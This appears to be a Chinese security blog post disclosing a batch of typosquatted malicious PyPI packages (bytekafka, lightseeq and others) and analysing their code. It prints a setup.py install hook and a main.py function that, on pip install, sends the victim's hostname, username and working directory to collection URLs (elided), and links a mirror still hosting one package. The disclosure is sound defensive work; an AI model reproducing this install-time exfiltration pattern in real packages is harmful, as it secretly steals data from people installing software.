PyPI仓库发现投毒组件

2024年11月15日在Python官方仓库发现下面一批具有共性的投毒组件:

  • lightseeq、lightsequ、lightseqe
  • bytekafka-0.0.15、bytekafka、bytekafka-0.15
  • ASLMutetion、v2xlm-gml、v2mlx-gml、x2vml-gml
  • BabetMF、BaibitMF、BebitMF
  • nurst、nerst、nuest、nuerst
  • byteseep、bytesip、bytesap

这批恶意组件用于进行信息收集,大概发布一天后就被pypi官方下架,但仍可在腾讯云PyPI镜像站下载,如:https://mirrors.cloud.tencent.com/pypi/simple/bytekafka/

投毒代码分析

以 bytekafka 投毒包为例,攻击者在包中植入了恶意代码,具体代码如下:

//setup.py
from setuptools import setup, find_packages
from setuptools.command.install import install


class CrazyInstallStrat(install):
    def run(self):
        install.run(self)
        from main import main
        main()

setup(
    name="bytekafka",
    version="99.7",
    author="x",
    author_email="xxx@outlook.com",
    description="x",
    long_description_content_type="text/markdown",
    long_description="xxx",
    cmdclass={
        'install': CrazyInstallStrat,
    },
    install_requires=['requests'],
    setup_requires=['setuptools']
)
//main.py
def main():
    hostname = platform.node()
    username = getpass.getuser()
    current_path = os.getcwd()
    rd_num = random.randint(10000, 99999)
    urls = [
        //信息收集url地址
    ]

    for url in urls:
        params = {
            "packagename": "bytekafka",
            "hostname": hostname,
            "user": username,
            "path": current_path
        }
        full_url = f"{url}/realtime_p/pypi/{rd_num}?{urllib.parse.urlencode(params)}"
        try:
            with urllib.request.urlopen(full_url) as response:
                logging.info(response.read().decode())
        except Exception as e:
            logging.error(f"Could not reach {url}: {e}")

当用户通过pip install安装投毒包触发setup.py中的钩子函数,调用main.py中的main方法,进而窃取用户的主机名、用户名、工作目录和IP地址信息。

(1)
上一篇 2024年1月2日 上午10:55
下一篇 2023年8月30日 下午12:02

相关推荐

  • 墨菲安全在软件供应链安全领域阶段性总结及思考

    向外看:墨菲安全在软件供应链安全领域的一些洞察、思考、行动 洞察 现状&挑战: 正在发生的: 思考 为什么这么说? 一个行业越成熟,那么其生产过程中供应链体系就越完善和标准化,比较典型的案例就是汽车的生产和制造; 以汽车生产和制造为例,这个行业非常成熟,因此其供应链体系也相当完善和标准化。以下是一些具体的表现: 总的来说,随着汽车生产和制造行业的成熟…

    2024年1月2日
    0
  • Smartbi 登录代码逻辑漏洞

    漏洞类型 身份验证不当 发现时间 2023/7/3 漏洞等级 高危 MPS编号 MPS-kb1w-cdn6 CVE编号 – 漏洞影响广度 广 漏洞危害 OSCS 描述 Smartbi是一款企业级商业智能与大数据分析平台。由于Smartbi登录代码存在逻辑缺陷,攻击者可利用该漏洞登录管理员账号,进而利用系统后台加载扩展包功能执行任意代码。参考链接:…

    2023年8月30日
    0